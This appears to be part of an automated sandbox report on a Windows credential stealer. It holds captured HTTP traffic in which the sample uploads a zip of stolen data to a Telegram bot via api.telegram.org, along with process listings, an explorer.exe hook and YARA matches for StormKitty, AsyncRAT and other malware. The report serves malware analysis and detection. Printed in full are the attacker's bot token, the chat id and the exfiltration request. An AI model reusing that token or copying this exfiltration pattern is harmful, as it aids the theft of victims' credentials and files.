                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41504cb09e05-EWR
                                                                                                                                                                                                                                2024-07-06 11:29:06 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                51192.168.2.449938149.154.167.220443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC1518OUTPOST /bot7347450494:AAG6CMHwBd3FeRdexRASKIMPj2MuZf6S2dw/sendDocument?chat_id=212019462&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:28%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97% [TRUNCATED]
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dc9e6ac9ab89e3
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Content-Length: 672709
                                                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 36 61 63 39 61 62 38 39 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 31 33 34 33 34 39 5c 40 5b 55 6e 69 74 65 64 20 53 74 61 74 65 73 5d 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 4b 03 04 2d 00 01 00 08 00 a1 3b e6 58 a5 a6 7d 01 ff ff ff ff ff ff ff ff 0f 00 38 00 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 74
                                                                                                                                                                                                                                Data Ascii: --------------------------8dc9e6ac9ab89e3Content-Disposition: form-data; name="document"; filename="C:\Users\user\AppData\Roaming\134349\@[United States].zip"Content-Type: application/x-ms-dos-executablePK-;X}8Information.t
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: 01 6e ec 85 6b 78 92 f5 04 bd e4 56 fe 58 30 fc 55 92 97 27 05 bb 8a 21 2f 0e 0c d5 77 b6 9f 32 8c 70 b9 06 1b d9 81 b8 96 3a d8 fe 5d 33 9a c2 f5 d9 bc 2b 9a 7f 7d 66 52 0f 74 b7 94 5c 92 6a 94 0b 2c 78 85 27 6a d4 8e f5 0e e9 58 4f a3 0e 14 46 73 9a 16 7a 0d e9 f3 61 2b 0c 1f 58 9e 1d 4f e1 27 51 36 1f bd ce 83 86 57 e3 c4 2e 53 62 1b ee b9 07 e0 08 3f 03 0c 47 e6 52 4a 6d 6c 9a 30 b1 39 d3 79 44 b5 f0 ef 51 a8 3c 37 2d 88 d8 0b 06 fb 33 c4 a9 e4 97 91 9c fb 4e a0 4a 68 d0 11 34 0f 74 99 fa f8 d0 62 fb fa 06 6d b5 68 9e 2e b7 18 eb f8 66 49 03 39 b2 69 54 2a ff 0d f7 f5 99 c5 ae 37 e4 2c 83 bb ad 9c f6 9d 38 ca 73 54 db 98 b1 fb 20 10 a8 19 06 b4 02 42 b6 0b bd 86 2f 54 e0 44 a1 1c 52 b4 ed 4d da 9f 49 fd f5 82 b5 83 1d bf 8b 69 be ed 3c 2e f0 ae 12 a0
                                                                                                                                                                                                                                Data Ascii: nkxVX0U'!/w2p:]3+}fRt\j,x'jXOFsza+XO'Q6W.Sb?GRJml09yDQ<7-3NJh4tbmh.fI9iT*7,8sT B/TDRMIi<.
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: ca 7a f5 18 6e 51 6e 44 ec c3 09 93 c3 11 bb e5 fe c0 75 ac c3 a0 20 27 cb da 71 7d 3c 6f 18 05 a2 d3 25 56 88 2b 06 d8 2f 50 59 fc 3a a1 9c 59 6d b1 bf 14 6b bf 85 08 0b 6d 72 d0 88 63 42 b0 53 aa 8b e1 eb cc 7a b8 b7 af f9 ee 0e 49 19 f6 5e 70 9e bf fb ea 92 e3 f4 20 9e 9c a9 62 65 e5 6b 5f d4 c4 6a 71 ce 0c 09 7a 30 71 e5 a0 cb dc cb 87 af 6d 5d 7a e9 58 cc 96 c3 57 11 02 dd eb ce 77 24 78 e4 85 4d 2b c2 52 81 0f 5f ee 6d 17 eb f7 a4 28 2e 7a 1f a1 de 7f b3 d5 6e ad c6 42 f2 62 2c 12 02 ee fd 87 fd 61 02 5e 74 3a c7 0e 3f 54 81 0f 5d c5 3c 2d bd 37 1a 95 42 34 44 fb b3 59 37 23 3d d7 df a7 23 b1 12 07 18 11 6a 1b 75 d4 a9 b4 d2 7e 77 d6 23 25 57 f5 1c f9 dd 22 47 9c bc ae bf 80 ac 9d 5e 5e ab 25 12 64 90 e4 9c 8f 51 ca 74 71 b5 fd 27 7b 7d 07 7a f6 5a
                                                                                                                                                                                                                                Data Ascii: znQnDu 'q}<o%V+/PY:YmkmrcBSzI^p bek_jqz0qm]zXWw$xM+R_m(.znBb,a^t:?T]<-7B4DY7#=#ju~w#%W"G^^%dQtq'{}zZ
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: 64 56 9a 30 b8 15 7a d1 9b b9 1e c2 01 00 b2 f1 2d 17 fa a3 45 90 81 b4 4f 33 70 52 62 b3 53 47 c8 61 ee 59 6f f7 f9 59 85 8c 88 e4 69 6d 32 9e 0d c3 aa 3d 2d 93 d6 74 dd a8 fb 12 6c d2 70 64 72 35 32 60 27 44 cc 2f 51 6f 7a cd da a0 15 c7 70 c0 06 88 7e e7 9f 26 96 1f 60 df 59 c4 c3 ad aa a5 d3 95 25 57 3f 9a ec cf 01 69 f0 16 ef da 84 1d 77 fc 23 28 96 cb d0 7c 20 3d e4 07 6f 9b df de 2d 14 7b d5 10 98 6d 08 97 38 c0 36 24 8f b4 04 40 d3 5d 79 f9 21 f3 0b 28 a6 d5 38 8c ef 52 5c e2 96 2e c3 53 e4 6c 18 b9 b7 5f 4e 18 04 5c 71 5a c3 2e e8 df 76 37 19 10 e6 02 4a dc a8 d6 56 7b 2e ac 51 a3 77 93 6a 01 a9 5e b3 bd 1d bd 84 f1 12 8f 41 8c b5 8a 30 f2 6d 6f b1 70 e7 d5 8d 5c ef 29 5b e0 d4 d1 c8 26 cd 7b b7 3f 54 b3 b3 8e 96 79 5b 11 88 bb 75 8c f2 96 b7 20
                                                                                                                                                                                                                                Data Ascii: dV0z-EO3pRbSGaYoYim2=-tlpdr52`'D/Qozp~&`Y%W?iw#(| =o-{m86$@]y!(8R\.Sl_N\qZ.v7JV{.Qwj^A0mop\)[&{?Ty[u
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: 4f 3a 53 56 62 a3 58 95 56 31 a0 ec e5 ee 9f 26 0c d0 7f e5 78 6d be 88 e4 79 92 51 82 2d d3 94 eb 7d 17 fb e5 bf c3 09 21 a5 19 05 95 e5 05 2f fe db 84 a4 76 e1 d8 fb 1c 8a 12 0e e9 82 8d a7 72 97 26 f7 a3 23 28 11 ef 73 04 3f 73 d5 19 e1 63 ed 12 9e cb 79 fa 74 1f 10 07 4f 32 03 0e 40 d6 b3 8f 5b 41 21 a2 a4 59 1b bb a9 83 65 c5 4d f2 3d 0f 33 37 40 84 4e 0a 7d 65 bf 7e 19 bb 69 a7 3f b8 0b ee 01 1d de bb 51 d1 b7 09 60 46 eb d8 f3 d3 80 6d e8 7a 7c bb 8b a0 1c 79 75 fd de 57 08 b5 02 27 8b 1a 6c e2 ed 05 58 dd a1 1f 0b b0 cb cf 7b 18 03 7e 22 aa 4b 9a 17 f6 32 47 8a 8e 93 e9 13 85 25 95 0a d6 ef a2 74 89 81 98 85 79 08 69 81 17 05 6f d1 6a ae 67 3f 30 68 61 88 5a 27 4e e1 72 73 00 64 f6 f8 ac 00 9e 2b 4d a0 08 eb 85 79 c0 42 0c 23 d1 fc a8 2a 15 8e f0
                                                                                                                                                                                                                                Data Ascii: O:SVbXV1&xmyQ-}!/vr&#(s?scytO2@[A!YeM=37@N}e~i?Q`Fmz|yuW'lX{~"K2G%tyiojg?0haZ'Nrsd+MyB#*
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: 1a 84 95 38 0a 58 a7 87 6d 1e 77 2f 88 2e b6 a1 51 98 c1 2e fd e8 4b 39 e4 08 d0 dd 98 cb ab 8b 2b 0a 74 f6 eb 5b fe c3 7f c1 20 c6 c2 f4 37 51 5b bb ca e0 da 16 81 a9 86 a8 e1 af 52 f1 4a 2c 86 ee ec dd 53 94 14 c2 46 1e da 41 ec bc a7 f0 d4 3d a0 f0 5a 74 35 15 33 77 b5 67 a6 23 49 09 43 05 2f 38 20 e0 68 61 a9 e5 25 0d 23 75 dd b5 5c fb fb 5d ac 8d e9 df 5f e1 79 17 17 35 35 c5 da c1 29 b3 ad ec e5 ca 5a 0c 04 7c 4b 2c 7f 9f 1d b4 f1 78 93 04 b6 99 4f 4c a9 5b 0b 22 e9 03 20 0b 9d 3a c5 d4 1e ab 9e de 0b 7c e9 0d 00 16 73 89 16 ed a4 49 03 29 2f 11 74 2e ed 17 6a 92 16 62 e3 a5 d6 c1 31 d6 f4 3f 0a 6c ce 9a d3 93 db fb b7 59 4e f8 9b ad 49 1d b6 06 d5 d5 0d ca 4d b1 76 40 bc 82 45 6d 7a b6 81 83 e8 b7 35 0e 76 2c 30 6f 71 80 db 56 a0 45 8f 3e d1 a0 f4
                                                                                                                                                                                                                                Data Ascii: 8Xmw/.Q.K9+t[ 7Q[RJ,SFA=Zt53wg#IC/8 ha%#u\]_y55)Z|K,xOL[" :|sI)/t.jb1?lYNIMv@Emz5v,0oqVE>
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: 91 36 4a 0e d7 8a d0 9a a5 5a 6f 96 a2 bd f4 72 34 75 9f 7e f7 a9 b5 87 12 f7 f0 2a ec 22 68 2d 6e 92 9f 9d 3e 3a 98 c2 47 79 4e f5 03 d2 50 6a a2 d6 90 c6 7b eb 2a 8c c1 2f 85 e9 ee 4e c3 17 a7 48 1d 9c 76 8d a1 fa 6f 9d ab a4 a7 74 2a 8a df 7f dd 9d 56 a7 05 38 bb 19 4a 12 b2 f8 06 91 8d a3 15 24 08 99 4c 7f a8 3b 42 b8 fa 5b 29 67 ab 88 8b 11 6f 71 7b e6 0e e5 36 91 3c 73 71 13 f4 0b a4 b5 b8 f9 2c d1 51 f8 8a 50 31 57 72 9c 08 cc 33 cf a0 56 0e 51 83 d3 a9 70 69 d9 40 9f fe 89 6a c2 0b 93 95 af 18 f3 5a 72 51 25 f5 5b 35 ee 8d f9 db 3f 05 96 47 08 3e c5 5a 0a 3c 1c 39 fb ce da 4f 7b 42 07 ce af a7 c7 90 1b ac 7f f7 2f ef 69 f9 a8 c2 3c 98 c3 b1 fc 78 e6 ce 51 ff c3 5e 3f 43 fe 43 5a 41 0a 5d c8 b2 08 eb e4 b6 06 d5 8b b9 40 4a 87 af ac d4 d7 49 da f9
                                                                                                                                                                                                                                Data Ascii: 6JZor4u~*"h-n>:GyNPj{*/NHvot*V8J$L;B[)goq{6<sq,QP1Wr3VQpi@jZrQ%[5?G>Z<9O{B/i<xQ^?CCZA]@JI
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: 8b df 2a 5c d2 ae 93 5e 65 c4 26 ec 7f 4a ac 35 87 23 d0 b6 5f b7 6e a6 48 e9 bd 06 15 0e 21 62 ca aa 5c 54 4e b4 65 4c cc b5 9a 0f e3 3b 08 c7 b5 15 d8 d0 af 44 ab 3d a9 22 ac aa 3a 0e 34 07 d0 dc 6a 99 82 4b af 14 6b b0 ff 62 3e 24 4a db f3 87 ca ea 51 5c 76 62 95 fe 26 a9 44 0b 4e 4e 10 56 22 80 ac 5e e4 d8 71 9d e9 bd 1a 13 57 e1 2b 5e 01 e3 39 ab 65 31 76 d1 93 68 29 7d 3d 92 db 91 79 27 97 38 f3 c2 a4 87 52 95 cc 10 c2 60 46 4a b1 2b 5c 1d 16 65 0a 6a 1a 4e 19 1c 17 3c d1 fd 39 15 8d 4d 65 93 8e b7 29 5d 3d 1f 93 c9 a8 20 54 d6 03 0b d3 28 9d cc 45 70 4a e0 c9 fe ed 31 3c 8a be 46 7f 2d 17 d4 48 8f fe fe 1e f5 c7 41 fa c4 86 9f 57 b8 fd 8d 00 0c 6b b1 ca cf 5a 79 20 25 ac a0 56 a1 c7 92 f1 df d0 4e 66 1d db b9 92 a6 cb c1 c1 fc 5d 64 ab 75 ea fc 32
                                                                                                                                                                                                                                Data Ascii: *\^e&J5#_nH!b\TNeL;D=":4jKkb>$JQ\vb&DNNV"^qW+^9e1vh)}=y'8R`FJ+\ejN<9Me)]= T(EpJ1<F-HAWkZy %VNf]du2
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: e4 a6 69 5f 13 92 64 fc 11 d1 a7 bf a8 8e b3 a9 0c cf c9 ea 22 22 77 20 f3 1d 0e 37 6a 24 8d 68 3e 2c fd 14 29 6f 90 8c f5 07 9a b3 cd 2f 0a 54 55 fb 32 0e be a7 fa 8d ea d1 71 64 c1 8e a9 5f 6c 1d c8 b9 d0 82 90 b5 17 94 59 12 9f 95 0f 13 81 7d fa 96 95 0d b7 ab 78 90 1e 60 94 11 b2 02 9b fe a3 b8 9b 26 43 74 15 82 72 f4 60 fe 65 01 d5 f8 c5 1e da ff ab de 58 35 14 30 96 f1 07 20 c5 84 9e b4 99 29 5a 2d 2a b0 fa 50 2d 74 42 48 07 2f d7 3a 33 95 78 76 73 f5 4c e2 36 0f 70 8d 41 5a 5d cb 68 f4 45 5d 6c f0 ba 0c 3b 32 e7 5e af 7f ff b9 41 d6 4c bb cb 7c d5 5c 17 43 4a a7 53 3d cc 34 50 65 55 6e 61 58 cc cb e5 e4 ab f8 3a 86 55 8b 58 2e 51 c4 cc 1e 67 9b cc 32 3e 8c 0c 3b b7 69 c2 d4 f2 c0 e4 fa 5d 49 ae 19 f9 f0 a3 67 dc 31 9e c4 09 7f 1b df d0 e2 8f ae ec
                                                                                                                                                                                                                                Data Ascii: i_d""w 7j$h>,)o/TU2qd_lY}x`&Ctr`eX50 )Z-*P-tBH/:3xvsL6pAZ]hE]l;2^AL|\CJS=4PeUnaX:UX.Qg2>;i]Ig1
                                                                                                                                                                                                                                2024-07-06 11:29:07 UTC16355OUTData Raw: b3 30 4a 35 9a 4e 2c 68 a0 dd bf 52 f4 f2 49 9a 9b 09 6f 51 f0 69 7e 4e f9 f1 10 99 66 fa cf 0d a5 7a 09 f1 7d d5 b0 25 1c 61 45 a9 de d5 f8 25 98 85 47 b2 a3 8b 85 bc c8 fc d7 e1 18 7d 65 ff 13 e0 5e 55 ec 99 20 f3 20 60 25 11 74 12 80 eb a9 11 be d0 46 e9 bb 22 01 4b 84 91 31 49 17 2a 4b 40 8f 1e f2 e8 73 56 5d 18 93 a5 6b a4 6b 17 e9 f4 86 f4 5b 40 47 03 34 c0 01 92 3d 5d 2b 9c ae 81 29 b8 32 4e 6a a5 15 35 0c e4 e7 fd 24 ee b0 b6 61 de d5 11 d9 75 7b 4d 64 36 d9 17 7c fd fa 4f b5 cc 3a 94 11 91 a7 44 71 88 6b 8b b9 a6 50 12 91 4f 85 6a 1f c5 4e d0 66 42 d4 e8 ac 43 2a d8 32 aa 55 27 85 e3 fc 2a 6d 48 98 10 7f a5 73 ae 36 b9 92 e9 39 14 d2 24 c4 4d ec f5 34 e6 e4 a7 e4 05 b4 76 e7 f5 7e 68 09 78 69 c7 f6 30 6d 8d 41 9b d3 fa 88 6d 48 d9 82 50 05 88 29
                                                                                                                                                                                                                                Data Ascii: 0J5N,hRIoQi~Nfz}%aE%G}e^U `%tF"K1I*K@sV]kk[@G4=]+)2Nj5$au{Md6|O:DqkPOjNfBC*2U'*mHs69$M4v~hxi0mAmHP)
                                                                                                                                                                                                                                2024-07-06 11:29:08 UTC1865INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:08 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 1476
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                {"ok":true,"result":{"message_id":121,"from":{"id":7347450494,"is_bot":true,"first_name":"Crypto Factory \ud83e\uddca","username":"CryptoFactory_robot"},"chat":{"id":212019462,"first_name":"BIBIL","username":"BIBIL_0DAY","type":"private"},"date":1720265348,"document":{"file_name":"C UsersuserAppDataRoaming134349@[United States].zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAN5ZokqhL6v_3dFVysObYIrIcZhCx8AAjUTAAIPlVBQHPprI-MoWJc1BA","file_unique_id":"AgADNRMAAg-VUFA","file_size":672450},"caption":"==== RL STEALER ==== \n\u23f0 Date => 07/06/2024 7:28\n\ud83d\udcbbSystem => Windows 10 Pro (64 Bit)\n\ud83d\udc64 User => user\n\ud83c\udd94 PC => 134349\n\ud83c\udff4 Country => [United States]\n\ud83d\udd0d IP => 8.46.123.33\n\ud83d\udcdd Language => \ud83c\udde8\ud83c\udded en-CH\n\ud83d\udd13 Antivirus => Windows Defender.\n ===={ User Data }====\n\ud83d\udcc2 FileGrabber => 81\n\ud83d\udce6 Telegram => \u274c\n\ud83d\udcb8 Wallets => \u274c\n\ud83d\udcac Discord => \u274c\n\ud83d\udce1 FileZilla: [TRUNCATED]


                                                                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                                                                                                CreateProcessInternalWINLINEexplorer.exe
                                                                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                                                                CreateProcessInternalWINLINE0xE9 0x90 0x00 0x07 0x75 0x5B

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:07:26:55
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\xj40xovMsm.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff68a180000
                                                                                                                                                                                                                                File size:15'088'640 bytes
                                                                                                                                                                                                                                MD5 hash:1082572A44D4C41214A3C38DCD8289F9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                Start time:07:27:06
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\relog.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\relog.exe
                                                                                                                                                                                                                                Imagebase:0x7ff698010000
                                                                                                                                                                                                                                File size:53'760 bytes
                                                                                                                                                                                                                                MD5 hash:F445286ECB5A74AAF2C103D05879F1C1
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:07:27:08
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000000.1786621795.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000000.1786520032.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000000.1790427329.000000000C350000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:07:27:10
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:07:27:15
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe"
                                                                                                                                                                                                                                Imagebase:0xee0000
                                                                                                                                                                                                                                File size:631'296 bytes
                                                                                                                                                                                                                                MD5 hash:BED8CDCED2D57BE2BD750F0F59991ECD
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_KeyzetsuClipper, Description: Yara detected Keyzetsu Clipper, Source: 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                                                                                                                                • Detection: 56%, Virustotal, Browse
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:07:27:16
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe"
                                                                                                                                                                                                                                Imagebase:0x190000
                                                                                                                                                                                                                                File size:179'200 bytes
                                                                                                                                                                                                                                MD5 hash:68FAD5F5F8DE1C290DF5D3754B4AF358
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
